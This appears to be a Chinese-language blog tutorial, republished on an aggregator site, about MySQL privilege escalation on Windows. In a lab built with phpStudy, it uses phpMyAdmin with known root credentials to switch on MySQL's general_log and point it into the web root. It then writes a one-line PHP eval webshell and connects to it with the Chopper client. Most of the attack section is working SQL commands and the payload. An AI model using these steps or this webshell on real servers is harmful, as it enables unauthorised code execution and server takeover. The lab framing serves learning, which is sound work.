概述
写在前面的废话(忽略)
这篇文章是写基于windows环境下的一些mysql提权方法的分析并利用。这些方法老生常谈,但困于很多文章在讲分析和利用的时候模棱两可,因此想总结一下常见的方法思路。基于windows的提权姿势多的数不胜数,一般在配置文件可以嗅探到root密码的情况(root密码已知)下,或者注入、爆破拿到root密码下,可以考虑mysql提权。文章内容很基础,下面对这些方法进行一些粗谈!
实验环境
靶机A: Windows 7 SP1
靶机B: Windows server 2003 enterprise x64
Phpstudy搭建的php+mysql
php版本:5.4.45
mysql版本:5.5.53
攻击环境:已知root账号密码,网站存在phpmyadmin页面
通过phpmyadmin来getshell
简单测试
利用log变量,猜一下绝对路径
看到phpstudy,猜测根目录在WWW下,into outfile写个马测一下能传不
果然是用不成into outfile,因为file_priv为null,那么尝试使用日志写马
利用日志写shell
开启日志记录
set global general_log='on';
日志文件导出指定目录
set global general_log_file='C:/phpstudy/WWW/hp.php';
记录sql语句写马,这里我就是演示一下,没有安全狗,直接传原马
select '<?php @eval($_POST["hp"]); ?>';
关闭记录
set global general_log=off;
菜刀连接
url: 192.168.11.106/hp.php
看一下权限,普通成员hpd0egr,创建用户错误5。接下来开始提权之路!
最后
以上就是欣慰高跟鞋为你收集整理的mysql提权win_Windows下MySql提权分析的全部内容,希望文章能够帮你解决mysql提权win_Windows下MySql提权分析所遇到的程序开发问题。
如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。
发表评论 取消回复